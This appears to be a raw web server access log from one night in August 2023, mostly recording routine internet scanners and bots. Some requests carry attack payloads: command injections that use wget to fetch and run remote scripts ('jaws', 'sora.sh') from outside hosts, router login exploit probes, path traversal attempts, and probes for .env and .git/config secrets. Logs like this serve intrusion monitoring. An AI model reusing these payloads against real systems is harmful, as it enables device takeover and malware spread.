95.214.27.160 - - [07/Aug/2023:00:49:03 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
103.161.176.39 - - [07/Aug/2023:00:52:07 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+103.16.161.29/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
35.240.121.17 - - [07/Aug/2023:00:55:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
185.224.128.141 - - [07/Aug/2023:01:01:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.141 - - [07/Aug/2023:01:04:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.141 - - [07/Aug/2023:01:06:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
162.216.149.238 - - [07/Aug/2023:01:06:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.27.160 - - [07/Aug/2023:01:08:31 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.224.128.141 - - [07/Aug/2023:01:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
5.42.95.167 - - [07/Aug/2023:01:11:33 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
103.14.26.208 - - [07/Aug/2023:01:17:32 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
24.224.142.23 - - [07/Aug/2023:01:21:36 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
95.214.27.160 - - [07/Aug/2023:01:22:18 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
205.210.31.76 - - [07/Aug/2023:01:22:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.27.160 - - [07/Aug/2023:01:22:36 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.88.90.144 - - [07/Aug/2023:01:22:36 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.248.133.37 - - [07/Aug/2023:01:22:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.37 - - [07/Aug/2023:01:22:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.37 - - [07/Aug/2023:01:22:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
84.54.51.12 - - [07/Aug/2023:01:23:29 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
118.151.220.154 - - [07/Aug/2023:01:31:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
54.80.195.101 - - [07/Aug/2023:01:59:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3030.112 Safari/537.32"
45.88.90.145 - - [07/Aug/2023:02:04:11 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
5.44.42.25 - - [07/Aug/2023:02:06:19 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.88.90.145 - - [07/Aug/2023:02:14:36 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.27.160 - - [07/Aug/2023:02:18:17 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
5.42.87.155 - - [07/Aug/2023:02:31:59 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
184.94.240.88 - - [07/Aug/2023:02:35:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
80.66.88.211 - - [07/Aug/2023:02:49:52 +0200] "\x03" 501 316 "-" "-"
20.29.115.150 - - [07/Aug/2023:02:59:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
162.216.150.17 - - [07/Aug/2023:03:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
5.44.42.25 - - [07/Aug/2023:03:09:44 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
87.27.132.180 - - [07/Aug/2023:03:10:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
3.101.152.182 - - [07/Aug/2023:03:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
47.88.6.178 - - [07/Aug/2023:03:12:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.254.76.138 - - [07/Aug/2023:03:12:06 +0200] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
45.227.254.55 - - [07/Aug/2023:03:12:28 +0200] "\x03" 501 316 "-" "-"
143.198.98.192 - - [07/Aug/2023:03:12:37 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
31.220.1.83 - - [07/Aug/2023:03:13:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
13.56.168.84 - - [07/Aug/2023:03:16:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
31.220.1.83 - - [07/Aug/2023:03:21:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.20.196.206 - - [07/Aug/2023:03:25:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
176.97.210.59 - - [07/Aug/2023:03:26:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.56.29.117 - - [07/Aug/2023:03:28:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.56.29.117 - - [07/Aug/2023:03:28:10 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.128.232.84 - - [07/Aug/2023:03:28:12 +0200] "CONNECT www.twitch.tv:443 HTTP/1.1" 405 343 "-" "-"
95.214.27.160 - - [07/Aug/2023:03:28:19 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
5.42.95.168 - - [07/Aug/2023:03:35:31 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
170.106.115.15 - - [07/Aug/2023:03:44:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
31.220.1.83 - - [07/Aug/2023:03:44:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
54.67.81.166 - - [07/Aug/2023:03:45:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
198.235.24.195 - - [07/Aug/2023:03:45:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.232 - - [07/Aug/2023:03:47:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.27.160 - - [07/Aug/2023:03:50:43 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
31.220.1.83 - - [07/Aug/2023:03:56:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [07/Aug/2023:04:02:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [07/Aug/2023:04:02:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
95.214.27.160 - - [07/Aug/2023:04:05:02 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
64.62.197.159 - - [07/Aug/2023:04:11:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.32 - - [07/Aug/2023:04:25:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
64.62.197.41 - - [07/Aug/2023:04:27:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
64.62.197.38 - - [07/Aug/2023:04:27:43 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
31.220.1.83 - - [07/Aug/2023:04:31:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
5.44.42.25 - - [07/Aug/2023:04:31:14 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
31.220.1.83 - - [07/Aug/2023:04:34:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
71.6.232.23 - - [07/Aug/2023:04:37:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
185.180.143.137 - - [07/Aug/2023:04:39:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.137 - - [07/Aug/2023:04:39:53 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.248.133.124 - - [07/Aug/2023:04:40:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.124 - - [07/Aug/2023:04:40:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.124 - - [07/Aug/2023:04:40:04 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.124 - - [07/Aug/2023:04:40:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
13.57.208.238 - - [07/Aug/2023:04:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
162.142.125.14 - - [07/Aug/2023:04:47:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.14 - - [07/Aug/2023:04:47:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.14 - - [07/Aug/2023:04:47:13 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.14 - - [07/Aug/2023:04:47:13 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [07/Aug/2023:04:47:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
95.214.27.160 - - [07/Aug/2023:04:50:44 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.94.138.34 - - [07/Aug/2023:04:51:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.34 - - [07/Aug/2023:04:51:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.34 - - [07/Aug/2023:04:51:00 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.34 - - [07/Aug/2023:04:51:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [07/Aug/2023:04:51:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
95.214.27.160 - - [07/Aug/2023:04:53:27 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
52.167.144.38 - - [07/Aug/2023:04:53:35 +0200] "GET /sitemaps.xml HTTP/1.1" 404 317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
41.73.166.48 - - [07/Aug/2023:04:55:32 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ testbots.maizhangyu.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
143.202.3.53 - - [07/Aug/2023:05:03:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
13.56.168.84 - - [07/Aug/2023:05:03:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
172.104.11.4 - - [07/Aug/2023:05:03:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.33.80.243 - - [07/Aug/2023:05:04:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
84.54.51.12 - - [07/Aug/2023:05:06:09 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
45.79.181.104 - - [07/Aug/2023:05:06:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.223 - - [07/Aug/2023:05:07:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.105.128.13 - - [07/Aug/2023:05:09:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
66.175.213.4 - - [07/Aug/2023:05:10:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
84.54.51.12 - - [07/Aug/2023:05:15:58 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
45.79.128.205 - - [07/Aug/2023:05:18:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.155.90.220 - - [07/Aug/2023:05:18:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.104.11.4 - - [07/Aug/2023:05:20:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.179 - - [07/Aug/2023:05:21:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.216.149.215 - - [07/Aug/2023:05:22:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.209.125.124 - - [07/Aug/2023:05:29:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
54.67.81.166 - - [07/Aug/2023:05:31:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
51.254.59.113 - - [07/Aug/2023:05:31:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
35.88.3.165 - - [07/Aug/2023:05:40:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
193.106.29.122 - - [07/Aug/2023:05:42:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800067) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:54 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1" neopets.scan.leakix.org - - [07/Aug/2023:05:42:54 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:55 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:55 +0200] "GET /_all_dbs HTTP/1.1" 404 313 "-" "Mozilla/5.0 (l9scan/2.0.9383e2634323e21393e2231323; +https://leakix.net)"
165.232.76.155 - - [07/Aug/2023:05:42:55 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:55 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:55 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:55 +0200] "GET /s/9383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:58 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:58 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
165.232.76.155 - - [07/Aug/2023:05:42:58 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
18.144.9.96 - - [07/Aug/2023:05:44:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
52.167.144.38 - - [07/Aug/2023:05:46:30 +0200] "GET /sitemaps.xml HTTP/1.1" 404 317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
205.210.31.49 - - [07/Aug/2023:05:46:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.156.129.2 - - [07/Aug/2023:05:52:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.137 - - [07/Aug/2023:05:52:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.137 - - [07/Aug/2023:05:52:14 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:52:23 +0200] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:52:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:52:52 +0200] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:52:52 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:08 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:22 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:35 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:35 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:35 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:35 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.2 - - [07/Aug/2023:05:53:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
